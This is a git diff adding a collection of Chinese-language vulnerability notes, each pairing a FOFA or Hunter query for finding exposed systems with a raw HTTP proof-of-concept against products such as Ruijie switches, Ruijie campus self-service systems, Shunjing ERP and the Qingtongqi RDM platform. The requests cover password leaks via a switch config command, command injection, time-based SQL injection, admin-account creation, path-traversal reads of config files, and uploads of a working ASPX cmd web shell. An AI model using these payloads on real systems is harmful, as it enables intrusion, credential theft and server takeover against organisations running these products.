+<font style="color:rgb(31, 35, 40);">之后访问</font>
+
+```java
+/web/xml/webuser-auth.xml
+```
+
+![1710772700000-43f9f7d1-b323-4efa-b957-c54795239ba9.png](./img/-3rJ7WzmMGCuOLN8/1710772700000-43f9f7d1-b323-4efa-b957-c54795239ba9-191395.png)
+
+base64解码解密后登录admin权限后台
+
+![1710772786397-1c7129d9-d939-4185-83df-ffdd78bd226b.png](./img/-3rJ7WzmMGCuOLN8/1710772786397-1c7129d9-d939-4185-83df-ffdd78bd226b-444894.png)
+
+
+
+> 更新: 2024-06-24 11:42:27  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/cg198cbfykmz8637>
\ No newline at end of file
diff --git a/锐捷云课堂主机存在目录遍历漏洞.md b/锐捷云课堂主机存在目录遍历漏洞.md
new file mode 100644
index 0000000..d852a0d
--- /dev/null
+++ b/锐捷云课堂主机存在目录遍历漏洞.md
@@ -0,0 +1,28 @@
+# 锐捷云课堂主机存在目录遍历漏洞
+
+**一、漏洞简介**  
+<font style="color:rgb(34, 34, 34);">锐捷云课堂主机存在目录遍历漏洞</font>  
+**二、影响版本**
+
+锐捷云课堂主机
+
+**三、资产测绘**
+
+```plain
+body="云课堂主机"
+```
+
+●登录页面![1711904678558-9afdd3ad-2c1b-4252-bdef-cc1a79b99a05.png](./img/3K-g8lr70TGifHPH/1711904678558-9afdd3ad-2c1b-4252-bdef-cc1a79b99a05-289991.png)
+
+**四、漏洞复现**
+
+```plain
+/webgl.data
+```
+
+![1711904751591-c8b9ed38-de19-41d7-90c7-99eb0bc1fd49.png](./img/3K-g8lr70TGifHPH/1711904751591-c8b9ed38-de19-41d7-90c7-99eb0bc1fd49-598754.png)
+
+
+
+> 更新: 2024-06-24 11:42:25  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/do9k47bbx3c4fsna>
\ No newline at end of file
diff --git a/锐捷交换机WEB管理系统EXCU_SHELL密码信息泄漏漏洞.md b/锐捷交换机WEB管理系统EXCU_SHELL密码信息泄漏漏洞.md
new file mode 100644
index 0000000..6af993e
--- /dev/null
+++ b/锐捷交换机WEB管理系统EXCU_SHELL密码信息泄漏漏洞.md
@@ -0,0 +1,36 @@
+# 锐捷交换机WEB管理系统EXCU_SHELL密码信息泄漏漏洞
+
+# 一、漏洞简介
+<font style="color:rgb(31, 35, 40);">锐捷交换机 WEB 管理系统 EXCU_SHELL存在密码信息泄露漏洞，攻击者可从漏洞获取到管理员账号密码，从而以管理员权限登录。</font>
+
+# 二、影响版本
++ <font style="color:rgb(31, 35, 40);">锐捷交换机 WEB 管理系统</font>
+
+# <font style="color:rgb(31, 35, 40);">三、资产测绘</font>
++ hunter`web.body="img/free_login_ge.gif"&&web.body="./img/login_bg.gif"`
++ 登录页面
+
+![1693030700475-392f4913-2fd5-45e8-a33b-c5eb742be387.png](./img/HsfISm4uJkaUTn7g/1693030700475-392f4913-2fd5-45e8-a33b-c5eb742be387-471626.png)
+
+# 四、漏洞复现
+```plain
+GET /EXCU_SHELL HTTP/1.1
+Cmdnum: 1
+Command1: show running-config
+Confirm1: n
+User-Agent: Java/1.8.0_381
+Host: xx.xx.xx.xx
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Connection: close
+```
+
+![1693030750176-4431bab4-1796-4604-a4e5-40c3f8bb5936.png](./img/HsfISm4uJkaUTn7g/1693030750176-4431bab4-1796-4604-a4e5-40c3f8bb5936-223418.png)
+
+使用获取的账号密码成功登录系统
+
+![1693030780834-da105fd0-c0a5-483f-a016-d1a47499cc5e.png](./img/HsfISm4uJkaUTn7g/1693030780834-da105fd0-c0a5-483f-a016-d1a47499cc5e-719318.png)
+
+
+
+> 更新: 2024-06-24 11:42:27  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/hzkmpfxiryxd4dnp>
\ No newline at end of file
diff --git a/锐捷校园网自助服务系统login_judge.jsf任意文件读取漏洞补丁绕过.md b/锐捷校园网自助服务系统login_judge.jsf任意文件读取漏洞补丁绕过.md
new file mode 100644
index 0000000..2438f56
--- /dev/null
+++ b/锐捷校园网自助服务系统login_judge.jsf任意文件读取漏洞补丁绕过.md
@@ -0,0 +1,27 @@
+## 锐捷校园网自助服务系统login_judge.jsf任意文件读取漏洞补丁绕过
+
+校园网自助服务系统/selfservice/selfservice/module/scgroup/web/login_judge.jsf 接口处存在任意文件读取漏洞补丁绕过，通过将`view`编码即可绕过
+
+## fofa
+
+```javascript
+body="校园网自助服务系统"
+```
+
+## poc
+
+```javascript
+GET /selfservice/selfservice/module/scgroup/web/login_judge.jsf?vie%77=./WEB-INF/web.xml%3F HTTP/1.1
+Host: your-ip
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+
+
+```
+
+![image-20241025112954677](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410251129745.png)
+
+![image-20241025112527256](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410251125343.png)
\ No newline at end of file
diff --git a/锐捷系统接口auth存在远程命令执行漏洞.md b/锐捷系统接口auth存在远程命令执行漏洞.md
new file mode 100644
index 0000000..f33f736
--- /dev/null
+++ b/锐捷系统接口auth存在远程命令执行漏洞.md
@@ -0,0 +1,26 @@
+# 锐捷系统接口auth存在远程命令执行漏洞
+
+锐捷睿易是锐捷网络面向商务市场的子品牌。拥有便捷的网络、交换机、路由器、无线、安全、云服务六大产品线，解决方案涵盖商业零售、酒店、kt、网吧、监控与安全、物流、仓储、制造。通过该漏洞，攻击者可以任意执行服务器端的代码，编写后门，获得服务器权限，进而控制整个web服务器。
+
+## fofa
+
+```javascript
+body="cgi-bin/luci" && body="#f47f3e"
+```
+
+## poc
+
+```javascript
+POST /cgi-bin/luci/api/auth HTTP/1.1
+Host: 
+Content-Type: application/json
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+
+{"method":"checkNet","params":{"host":"`echo c149136B>AD0D5b8c.txt`"}}
+```
+
+
+
+## 漏洞来源
+
+- https://mp.weixin.qq.com/s/Vh64WEnrIDBBsZ6EuJqx4Q
\ No newline at end of file
diff --git a/锐捷网络股份有限公司校园网自助服务系统findOperatorOnlineUserCount24Hours存在SQL注入漏洞.md b/锐捷网络股份有限公司校园网自助服务系统findOperatorOnlineUserCount24Hours存在SQL注入漏洞.md
new file mode 100644
index 0000000..5168731
--- /dev/null
+++ b/锐捷网络股份有限公司校园网自助服务系统findOperatorOnlineUserCount24Hours存在SQL注入漏洞.md
@@ -0,0 +1,75 @@
+# 锐捷网络股份有限公司校园网自助服务系统findOperatorOnlineUserCount24Hours存在SQL注入漏洞
+
+# 一、漏洞简介
+锐捷网络股份有限公司校园网自助服务系统findOperatorOnlineUserCount24Hours存在SQL注入漏洞。
+
+# 二、影响版本
++ 锐捷网络股份有限公司校园网自助服务系统
+
+# 三、资产测绘
++ hunter`app="校园网自助服务系统"`
++ 特征
+
+![1698596756667-deb61ce2-460f-4df0-bfb5-037838f17027.png](./img/XdtS24xhzMy-H1dt/1698596756667-deb61ce2-460f-4df0-bfb5-037838f17027-944527.png)
+
+# 四、漏洞复现
+```http
+POST /selfservice/service/operatorReportorRoamService HTTP/1.1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate, br
+Connection: close
+Cookie: JSESSIONID=81AA808BC6E57EE95C343DD3FCB89394
+Upgrade-Insecure-Requests: 1
+SOAPAction: 
+Content-Type: text/xml;charset=UTF-8
+Host: 
+Content-Length: 399
+
+<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.webservice.common.spl.ruijie.com">
+   <soapenv:Header/>
+   <soapenv:Body>
+      <ser:findOperatorOnlineUserCount24Hours>
+         <!--type: string-->
+         <ser:in0>gero et';WAITFOR DELAY '0:0:5'--</ser:in0>
+      </ser:findOperatorOnlineUserCount24Hours>
+   </soapenv:Body>
+</soapenv:Envelope>
+```
+
+![1715606526425-645ee7d6-4644-4073-8d7f-4039afa5c77b.png](./img/XdtS24xhzMy-H1dt/1715606526425-645ee7d6-4644-4073-8d7f-4039afa5c77b-966318.png)
+
+sqlmap
+
+```http
+POST /selfservice/service/operatorReportorRoamService HTTP/1.1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate, br
+Connection: close
+Cookie: JSESSIONID=81AA808BC6E57EE95C343DD3FCB89394
+Upgrade-Insecure-Requests: 1
+SOAPAction: 
+Content-Type: text/xml;charset=UTF-8
+Host: 
+Content-Length: 399
+
+<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.webservice.common.spl.ruijie.com">
+   <soapenv:Header/>
+   <soapenv:Body>
+      <ser:findOperatorOnlineUserCount24Hours>
+         <!--type: string-->
+         <ser:in0>gero et</ser:in0>
+      </ser:findOperatorOnlineUserCount24Hours>
+   </soapenv:Body>
+</soapenv:Envelope>
+```
+
+![1715606556821-efc3d9e8-e3b4-420d-b2fa-b0b98e12fd92.png](./img/XdtS24xhzMy-H1dt/1715606556821-efc3d9e8-e3b4-420d-b2fa-b0b98e12fd92-988323.png)
+
+
+
+> 更新: 2024-06-24 11:42:27  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ih7fhkepsw3xw3bf>
\ No newline at end of file
diff --git a/锐捷网络股份有限公司校园网自助服务系统queryAccountNumReportDataDetail存在SQL注入漏洞.md b/锐捷网络股份有限公司校园网自助服务系统queryAccountNumReportDataDetail存在SQL注入漏洞.md
new file mode 100644
index 0000000..b0eaaa7
--- /dev/null
+++ b/锐捷网络股份有限公司校园网自助服务系统queryAccountNumReportDataDetail存在SQL注入漏洞.md
@@ -0,0 +1,95 @@
+# 锐捷网络股份有限公司校园网自助服务系统queryAccountNumReportDataDetail存在SQL注入漏洞
+
+# 一、漏洞简介
+锐捷网络股份有限公司校园网自助服务系统queryAccountNumReportDataDetail存在SQL注入漏洞。
+
+# 二、影响版本
++ 锐捷网络股份有限公司校园网自助服务系统
+
+# 三、资产测绘
++ hunter`app="校园网自助服务系统"`
++ 特征
+
+![1698596756667-deb61ce2-460f-4df0-bfb5-037838f17027.png](./img/VkEN-dwHXTrP9O5n/1698596756667-deb61ce2-460f-4df0-bfb5-037838f17027-798744.png)
+
+# 四、漏洞复现
+```plain
+POST /selfservice/service/operatorReportorRoamService HTTP/1.1
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
+Cookie: JSESSIONID=42E7A33A54CABB1580E34F01B3D63480; JSESSIONID=0616C2E6B689FD5702EE3E2203D660FB
+Connection: close
+SOAPAction: 
+Content-Type: text/xml;charset=UTF-8
+Host: 
+Content-Length: 873
+
+<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.webservice.common.spl.ruijie.com" xmlns:dom="http://domain.service.webservice.common.spl.ruijie.com">
+   <soapenv:Header/>
+   <soapenv:Body>
+      <ser:queryAccountNumReportDataDetail>
+         <ser:in0>
+            <!--type: dateTime-->
+            <dom:endTime>2008-09-29T09:49:45</dom:endTime>
+            <!--type: int-->
+            <dom:limit>3</dom:limit>
+            <!--type: int-->
+            <dom:offSet>3</dom:offSet>
+            <!--type: string-->
+            <dom:operatorsConfigUuid>aeoliam venit';WAITFOR DELAY '0:0:5'--</dom:operatorsConfigUuid>
+            <!--type: dateTime-->
+            <dom:startTime>2014-06-09T23:15:04+08:00</dom:startTime>
+         </ser:in0>
+      </ser:queryAccountNumReportDataDetail>
+   </soapenv:Body>
+</soapenv:Envelope>
+```
+
+![1713339788088-ab68d76f-65e0-4f00-beae-f05e2e7d6fad.png](./img/VkEN-dwHXTrP9O5n/1713339788088-ab68d76f-65e0-4f00-beae-f05e2e7d6fad-278254.png)
+
+sqlmap
+
+```plain
+POST /selfservice/service/operatorReportorRoamService HTTP/1.1
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
+Cookie: JSESSIONID=42E7A33A54CABB1580E34F01B3D63480; JSESSIONID=0616C2E6B689FD5702EE3E2203D660FB
+Connection: close
+SOAPAction: 
+Content-Type: text/xml;charset=UTF-8
+Host: 
+Content-Length: 873
+
+<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.webservice.common.spl.ruijie.com" xmlns:dom="http://domain.service.webservice.common.spl.ruijie.com">
+   <soapenv:Header/>
+   <soapenv:Body>
+      <ser:queryAccountNumReportDataDetail>
+         <ser:in0>
+            <!--type: dateTime-->
+            <dom:endTime>2008-09-29T09:49:45</dom:endTime>
+            <!--type: int-->
+            <dom:limit>3</dom:limit>
+            <!--type: int-->
+            <dom:offSet>3</dom:offSet>
+            <!--type: string-->
+            <dom:operatorsConfigUuid>aeoliam venit</dom:operatorsConfigUuid>
+            <!--type: dateTime-->
+            <dom:startTime>2014-06-09T23:15:04+08:00</dom:startTime>
+         </ser:in0>
+      </ser:queryAccountNumReportDataDetail>
+   </soapenv:Body>
+</soapenv:Envelope>
+```
+
+![1713339819071-b490ef2d-3d5c-4618-9666-2b16a9bd8972.png](./img/VkEN-dwHXTrP9O5n/1713339819071-b490ef2d-3d5c-4618-9666-2b16a9bd8972-518241.png)
+
+
+
+> 更新: 2024-06-24 11:42:27  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/xtp0qz0at8exgx9o>
\ No newline at end of file
diff --git a/锐明技术Mangrove系统任意用户创建漏洞.md b/锐明技术Mangrove系统任意用户创建漏洞.md
new file mode 100644
index 0000000..5e6033f
--- /dev/null
+++ b/锐明技术Mangrove系统任意用户创建漏洞.md
@@ -0,0 +1,27 @@
+## 锐明技术Mangrove系统任意用户创建漏洞
+
+锐明技术Mangrove系统任意用户创建漏洞，远程攻击者可以利用此漏洞创建管理员账户，从而接管系统后台，造成信息泄露，导致系统处于极不安全的状态。
+
+## fofa
+
+```
+body="Mvsp/RegisterLogin/Default.do"
+```
+
+## poc
+
+```javascript
+POST /Mvsp/RoleUserInfo/Default.do?Action=CreateUser&Type=post&DataType=Text&Guid=1721290869914 HTTP/1.1
+Host: 
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
+Upgrade-Insecure-Requests: 1
+Accept-Encoding: gzip, deflate
+Cookie: MVSP.U=VUlEPTEmVU49YWRtaW4yJkdJRD0xJlJJRD0x;
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
+
+UserId=&GroupPower=1&VehiclePower=&UserName=poiuy&RoleId=1&GroupId=1&ValidTime=&VideoTime=1&Enable=1&TelNo=1&Flow=&WarningFlow=&RealFlow=&MonthlyTime=&Description=&Email=&Password=test1234
+```
+
+![image-20241012131926688](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410121319743.png)
\ No newline at end of file
diff --git a/青藤云-EDR-权限提升漏洞.md b/青藤云-EDR-权限提升漏洞.md
new file mode 100644
index 0000000..e5a2dca
--- /dev/null
+++ b/青藤云-EDR-权限提升漏洞.md
@@ -0,0 +1,29 @@
+## 青藤云 EDR 权限提升漏洞
+```
+青藤的测试 POC
+local function save_python_info(ctx, info_table)
+local proc_names = {"python.exe"}
+local procs_ret = ctx.get_proc_list_info_rely(ctx, proc_names)
+if next(procs_ret) == nil then
+return
+end
+-- call get version
+-- ... 省略无关代码
+get_python_ver(proc) -- ... 省略无关代码
+end
+function get_python_ver(proc)
+if proc == nil then
+return "" end
+
+if file_api.file_exists(proc.path) then
+local cmdline = "\"" .. proc.path .. "\" -V"
+local ret, output = common.execute_shell(cmdline)
+if ret == 0 and output and output ~= "" then
+return regex.match(output, "\\d.+\\d")
+else
+agent.error_log("get python version info error:" .. tostring(ret))
+return "" end
+end
+End
+
+```
diff --git a/青铜器RDM研发管理平台upload存在任意文件上传漏洞.md b/青铜器RDM研发管理平台upload存在任意文件上传漏洞.md
new file mode 100644
index 0000000..dff4e35
--- /dev/null
+++ b/青铜器RDM研发管理平台upload存在任意文件上传漏洞.md
@@ -0,0 +1,53 @@
+# 青铜器RDM研发管理平台upload存在任意文件上传漏洞
+
+# 一、漏洞简介
+<font style="color:rgb(0, 0, 0);">深圳市青铜器软件系统有限公司,创业团队一直专注于提供产品创新和研发管理整体解决方案。公司在深入研究企业研发管理信息化需求的基础上，开发出针对完全拥有自主知识产权的研发管理软件RDM系列版本。青铜器RDM研发管理平台upload存在任意文件上传漏洞，攻击者可通过该漏洞获取服务器权限。</font>
+
+# <font style="color:rgb(0, 0, 0);">二、影响版本</font>
++ 青铜器RDM研发管理平台
+
+# 三、资产测绘
++ fofa`body="/images/rdm.ico"`
++ 特征
+
+![1712747446071-d672a11c-d403-40f5-ac90-89531045ad74.png](./img/uHZ6EwiBMeFVWmE3/1712747446071-d672a11c-d403-40f5-ac90-89531045ad74-317515.png)
+
+# 四、漏洞复现
+```java
+POST /upload?dir=cmVwb3NpdG9yeQ==&name=ZGVtby5qc3A=&start=0&size=7000 HTTP/1.1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
+Content-Type: multipart/form-data; boundary=00content0boundary00
+Host: 
+Cookie: JSESSIONID=AB3CC11444E566879F70BE78C0C518CA
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Content-Length: 260
+Connection: close
+
+--00content0boundary00
+Content-Disposition: form-data; name="file"; filename="poc.jsp"
+Content-Type: application/octet-stream
+
+<%out.println("1234");%>
+--00content0boundary00
+Content-Disposition: form-data; name="Submit"
+
+Go
+--00content0boundary00--
+```
+
+![1712747466309-473fb061-9d40-499b-bffc-ddd89079dc84.png](./img/uHZ6EwiBMeFVWmE3/1712747466309-473fb061-9d40-499b-bffc-ddd89079dc84-945013.png)
+
+文件上传位置
+
+```java
+GET /repository/000000000/demo.jsp HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+```
+
+![1712747538656-73854cfa-7c54-4377-96b2-1f5665114773.png](./img/uHZ6EwiBMeFVWmE3/1712747538656-73854cfa-7c54-4377-96b2-1f5665114773-676572.png)
+
+
+
+> 更新: 2024-04-20 22:03:39  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/lz5wvm37m8hz8p64>
\ No newline at end of file
diff --git a/顺景ERP管理系统FileUpload存在任意文件上传漏洞.md b/顺景ERP管理系统FileUpload存在任意文件上传漏洞.md
new file mode 100644
index 0000000..475635f
--- /dev/null
+++ b/顺景ERP管理系统FileUpload存在任意文件上传漏洞.md
@@ -0,0 +1,33 @@
+# 顺景ERP管理系统FileUpload存在任意文件上传漏洞
+
+顺景ERP管理系统FileUpload存在任意文件上传漏洞，允许攻击者上传恶意文件到服务器，可能导致远程代码执行、网站篡改或其他形式的攻击，严重威胁系统和数据安全。
+
+## fofa
+
+```javascript
+body="/api/DBRecord/getDBRecords"
+```
+
+## poc
+
+```javascript
+POST /api/FileUpload/Upload HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7yyQ5XLHOn6WZ6MT
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
+Connection: close
+
+------WebKitFormBoundary7yyQ5XLHOn6WZ6MT
+Content-Disposition: form-data; name="file"; filename="1.aspx"
+Content-Type: image/png
+
+<%@ Page Language="Jscript" validateRequest="false" %><%var c=new System.Diagnostics.ProcessStartInfo("cmd");var e=new System.Diagnostics.Process();var out:System.IO.StreamReader,EI:System.IO.StreamReader;c.UseShellExecute=false;c.RedirectStandardOutput=true;c.RedirectStandardError=true;e.StartInfo=c;c.Arguments="/c " + Request.Item["cmd"];e.Start();out=e.StandardOutput;EI=e.StandardError;e.Close();Response.Write(out.ReadToEnd() + EI.ReadToEnd());System.IO.File.Delete(Request.PhysicalPath);Response.End();%>
+------WebKitFormBoundary7yyQ5XLHOn6WZ6MT--
+```
+
+![image-20241106224458205](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411062244260.png)
+
+文件路径`/UpFiles/GUID值.aspx?cmd=whoami`
\ No newline at end of file
diff --git a/顺景ERP管理系统UploadInvtSpBuzPlanFile存在任意文件上传漏洞.md b/顺景ERP管理系统UploadInvtSpBuzPlanFile存在任意文件上传漏洞.md
new file mode 100644
index 0000000..71ad4b5
--- /dev/null
+++ b/顺景ERP管理系统UploadInvtSpBuzPlanFile存在任意文件上传漏洞.md
@@ -0,0 +1,31 @@
+# 顺景ERP管理系统UploadInvtSpBuzPlanFile存在任意文件上传漏洞
+
+顺景ERP管理系统UploadInvtSpBuzPlanFile存在任意文件上传漏洞，允许攻击者上传恶意文件到服务器，可能导致远程代码执行、网站篡改或其他形式的攻击，严重威胁系统和数据安全。
+
+## fofa
+
+```javascript
+body="/api/DBRecord/getDBRecords"
+```
+
+## poc
+
+```javascript
+POST /api/cgInvtSp/UploadInvtSpBuzPlanFile HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7yyQ5XLHOn6WZ6MT
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
+Connection: close
+
+------WebKitFormBoundary7yyQ5XLHOn6WZ6MT
+Content-Disposition: form-data; name="file"; filename="1.aspx"
+Content-Type: image/png
+
+<%@ Page Language="Jscript" validateRequest="false" %><%var c=new System.Diagnostics.ProcessStartInfo("cmd");var e=new System.Diagnostics.Process();var out:System.IO.StreamReader,EI:System.IO.StreamReader;c.UseShellExecute=false;c.RedirectStandardOutput=true;c.RedirectStandardError=true;e.StartInfo=c;c.Arguments="/c " + Request.Item["cmd"];e.Start();out=e.StandardOutput;EI=e.StandardError;e.Close();Response.Write(out.ReadToEnd() + EI.ReadToEnd());System.IO.File.Delete(Request.PhysicalPath);Response.End();%>
+------WebKitFormBoundary7yyQ5XLHOn6WZ6MT--
+```
+
+![image-20241106224316632](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411062243710.png)
\ No newline at end of file
diff --git a/顺景ERP管理系统UploadInvtSpFile存在任意文件上传漏洞.md b/顺景ERP管理系统UploadInvtSpFile存在任意文件上传漏洞.md
new file mode 100644
index 0000000..d7ccb12
--- /dev/null
+++ b/顺景ERP管理系统UploadInvtSpFile存在任意文件上传漏洞.md
@@ -0,0 +1,33 @@
+# 顺景ERP管理系统UploadInvtSpFile存在任意文件上传漏洞
+
+顺景ERP管理系统UploadInvtSpFile存在任意文件上传漏洞，允许攻击者上传恶意文件到服务器，可能导致远程代码执行、网站篡改或其他形式的攻击，严重威胁系统和数据安全。
+
+## fofa
+
+```javascript
+body="/api/DBRecord/getDBRecords"
+```
+
+## poc
+
+```javascript
+POST /api/cgInvtSp/UploadInvtSpFile HTTP/1.1
+Host: 
+Content-Type: multipart/form-data; boundary=-----------------1111
+Content-Length: 178
+
+-------------------1111
+Content-Disposition: form-data; name="filedata"; filename="2142142142.asp"
+Content-Type: image/png
+
+<% response.write("1111")%>
+-------------------1111--
+```
+
+![ebb92616e1835d80e80f6c6cb97ee814](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409111921995.png)
+
+
+
+## 漏洞来源
+
+- https://mp.weixin.qq.com/s/BrbgHxUO4GJ0Haza5xf6dQ
\ No newline at end of file
diff --git a/顺景ERP系统FullGuidFileName任意文件读取漏洞.md b/顺景ERP系统FullGuidFileName任意文件读取漏洞.md
new file mode 100644
index 0000000..ad0f35f
--- /dev/null
+++ b/顺景ERP系统FullGuidFileName任意文件读取漏洞.md
@@ -0,0 +1,24 @@
+# 顺景ERP系统FullGuidFileName任意文件读取漏洞
+
+顺景ERP是一款功能全面、高度集成、易于扩展的企业管理软件，能够帮助制造企业实现智能化、精益化管理，提升企业的竞争力和盈利能力。为企业提供全方位信息化的管理应用与支持，例如，在精密五金行业，系统可根据企业的业务流程及特性提供针对性信息化管理方案；在注塑行业，系统具有完整的水口料管理方案，对企业成本控制严谨到位；在电子行业，系统的BOM批量变更功能，能快速准确进行物料变更，并支持替代料功能等。顺景ERP TMScmQuote/GetFile 接口存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。
+
+## fofa
+
+```javascript
+body="/api/DBRecord/getDBRecords"
+body="顺景软件 WebAPI 服务端"
+```
+
+## poc
+
+```javascript
+GET /api/TMScmQuote/GetFile?FullGuidFileName=/../web.config&FileName= HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
+Accept: */*
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+```
+
+![image-20241211205713046](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412112057111.png)
diff --git a/顺景ERP系统GetFile任意文件读取漏洞.md b/顺景ERP系统GetFile任意文件读取漏洞.md
new file mode 100644
index 0000000..b93dffa
--- /dev/null
+++ b/顺景ERP系统GetFile任意文件读取漏洞.md
@@ -0,0 +1,24 @@
+# 顺景ERP系统GetFile任意文件读取漏洞
+
+顺景ERP是一款功能全面、高度集成、易于扩展的企业管理软件，能够帮助制造企业实现智能化、精益化管理，提升企业的竞争力和盈利能力。为企业提供全方位信息化的管理应用与支持，例如，在精密五金行业，系统可根据企业的业务流程及特性提供针对性信息化管理方案；在注塑行业，系统具有完整的水口料管理方案，对企业成本控制严谨到位；在电子行业，系统的BOM批量变更功能，能快速准确进行物料变更，并支持替代料功能等。顺景ERP Download/GetFile 接口存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。
+
+## fofa
+
+```javascript
+body="/api/DBRecord/getDBRecords"
+body="顺景软件 WebAPI 服务端"
+```
+
+## poc
+
+```javascript
+GET /api/Download/GetFile?FileName=/../web.config&Title= HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
+Accept: */*
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+```
+
+![image-20241128093802818](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411280938886.png)
diff --git a/飞企互联-FE-业务协作平台存在参数文件读取漏洞-.md b/飞企互联-FE-业务协作平台存在参数文件读取漏洞-.md
new file mode 100644
index 0000000..df0d32b
--- /dev/null
+++ b/飞企互联-FE-业务协作平台存在参数文件读取漏洞-.md
@@ -0,0 +1,11 @@
+## 飞企互联 FE 业务协作平台存在参数文件读取漏洞 
+
+## fofa
+```
+app="飞企互联-FE企业运营管理平台"
+```
+
+## poc
+```
+/servlet/ShowImageServlet?imagePath=../web/fe.war/WEB-INF/classes/jdbc.properties&print
+```
